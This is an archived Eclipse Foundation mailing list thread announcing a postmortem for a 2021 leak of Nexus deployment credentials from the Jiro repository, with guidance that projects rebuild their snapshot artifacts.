Skip to main content

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] [List Home]
Re: [cbi-dev] credentials leak


We've posted a postmortem about the incident atël-barbero/credentials-leaked-github


Mikaël Barbero 
Manager — Release Engineering and Technology | Eclipse Foundation
🐦 @mikbarbero
Eclipse Foundation: The Platform for Open Innovation and Collaboration

On 19 Feb 2021, at 19:50, Denis Roy <denis.roy@xxxxxxxxxxxxxxxxxxxxxx> wrote:


On Feb 16th 2021, we received a security report about secrets in the main Jiro repository. This report was correct. On March 18th 2020, the secrets were committed inside the repository.

The secrets were deployment credentials for the Nexus application running on While the credentials themselves were encrypted, the master password was also part of the leak. While this master password was not in clear text, it is fairly easy to decode it and then use it to decrypt the credentials.
We managed to validate - to the best of our knowledge - that no release artifacts were tainted because of this leak. Unfortunately, we can’t do much for the snapshot artifacts. We know that about 13k of them are signed jars, but for the rest, it’s impossible to deny or confirm anything.

As far as your release bits are concerned, you are safe and do not have to do anything. Regarding your snapshot, we’ve been pruning unused snapshots (for more than 60 days) from the repositories. We suggest you start building new snapshot versions of all used artifacts. Feel free to reach out to webmasters if you want to have a list of those.
We'll be publishing a full postmortem for this event in the days to come.

Denis Roy
Director, IT Services | Eclipse Foundation
Eclipse Foundation: The Community for Open Innovation and Collaboration
Twitter: @droy_eclipse
cbi-dev mailing list
To unsubscribe from this list, visit

Attachment: signature.asc
Description: Message signed with OpenPGP

Back to the top